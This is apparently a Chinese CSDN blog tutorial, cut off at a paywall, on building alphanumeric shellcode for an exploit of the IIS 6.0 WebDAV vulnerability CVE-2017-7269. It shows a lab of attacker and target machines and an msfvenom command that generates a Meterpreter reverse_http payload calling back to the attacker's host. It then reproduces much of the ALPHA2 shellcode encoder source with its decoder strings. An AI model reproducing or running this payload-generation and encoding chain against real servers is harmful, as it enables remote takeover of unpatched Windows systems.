针对IIS6.0 WebDAV漏洞(cve-2017-7269)制作纯字符数字的shellcode回连msf

最新推荐文章于 2022-01-22 10:51:06 发布

VIP文章 MickeyMouse1928

最新推荐文章于 2022-01-22 10:51:06 发布

阅读量4.7k

点赞数 1

分类专栏：内网渗透 shellcode metasploit 文章标签： metasploit shellcode iis cve-2017-7269

本文链接：https://blog.csdn.net/mickeymouse1928/article/details/71159858

版权

环境：

Kali攻击机1 IP：192.168.114.140

Win7攻击机2 IP（安装gcc和python2.7）：192.168.114.130

Windows server 2003目标主机（开启webdev服务）：192.168.114.132

在攻击机1中的操作：

使用msfvenom生成shellcode ：

msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c

在攻击机2中的操作：

创建一个文本文件，将以下代码拷贝进去，并修改成.c后缀名的任意命名文件（代码参照：https://bbs.ichunqiu.com/thread-21294-1-1.html 由于encode.c编译有误，下面是经过我修改和翻译后的encode.c，这个Alpha2是Linux下的源码源Appha2地址是：http://skypher.com/wiki/index.php/ALPHA2）：

// Alpha2.cpp : Defines the entry point for the console application.
//

#include <stdio.h> // printf(), fprintf(), stderr
#include <stdlib.h> // exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand()
#include <string.h> // strcasecmp(), strstr()
#include <time.h> //struct timeval, struct timezone, gettimeofday()
#include <winsock.h>
#define VERSION_STRING "ALPHA 2: Zero-tolerance. (build 07)"
#define COPYRIGHT      "Copyright (C) 2003, 2004 by Berend-Jan Wever."
/*
________________________________________________________________________________

    ,sSSs,,s,  ,sSSSs,  ALPHA 2: Zero-tolerance.
   SS"  Y$P"  SY"  ,SY
  iS'   dY       ,sS"   Unicode-proof uppercase alphanumeric shellcode encoding.
  YS,  dSb    ,sY"      Copyright (C) 2003, 2004 by Berend-Jan Wever.
  '"YSS'"S' 'SSSSSSSP   <[email protected]>
________________________________________________________________________________

  This program is free software; you can redistribute it and/or modify it under
  the terms of the GNU General Public License version 2, 1991 as published by
  the Free Software Foundation.

  This program is distributed in the hope that it will be useful, but WITHOUT
  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
  details.

  A copy of the GNU General Public License can be found at:
    http://www.gnu.org/licenses/gpl.html
  or you can write to:
    Free Software Foundation, Inc.
    59 Temple Place - Suite 330
    Boston, MA  02111-1307
    USA.

Acknowledgements:
  Thanks to rix for his phrack article on aphanumeric shellcode.
  Thanks to obscou for his phrack article on unicode-proof shellcode.
  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
*/

#define mixedcase_w32sehgetpc           "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089"
#define uppercase_w32sehgetpc           "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816"
#define mixedcase_ascii_decoder_body    "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
#define uppercase_ascii_decoder_body    "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI"
#define mixedcase_unicode_decoder_body  "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
#define uppercase_unicode_decoder_body  "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"

struct decoder {
  char* id; // id of option
  char* code; // the decoder
} mixedcase_ascii_decoders[] = {
  { "nops",     "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body },
  { "eax",      "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "ecx",      "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "edx",      "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body },
  { "ebx",      "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "esp",      "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "ebp",      "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "esi",      "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "edi",      "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp-10]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp-C]",  "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp-8]",  "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp-4]",  "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp]",    "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+4]",  "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp+8]",  "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+C]",  "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp+10]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+14]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "[esp+18]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
  { "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
  { "seh",      mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code
                mixedcase_ascii_decoder_body },
  { NULL, NULL }
}, uppercase_ascii_decoders[] = {
  { "nops",     "IIIIIIIIIIII" uppercase_ascii_decoder_body },
  { "eax",      "PYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "ecx",      "IIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
  { "edx",      "JJJJJJJJJJJRY" uppercase_ascii_decoder_body },

最低0.47元/天解锁文章

MickeyMouse1928

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
针对IIS6.0 WebDAV漏洞(cve-2017-7269)制作纯字符数字的shellcode回连msf

环境：Kali攻击机1 IP：192.168.114.140Win7攻击机2 IP（安装gcc和python2.7）：192.168.114.130Windows server 2003目标主机（开启webdev服务）：192.168.114.132 在攻击机1中的操作：使用msfvenom生成shellcode ：msfvenom -pwindows/meterpre
复制链接

扫一扫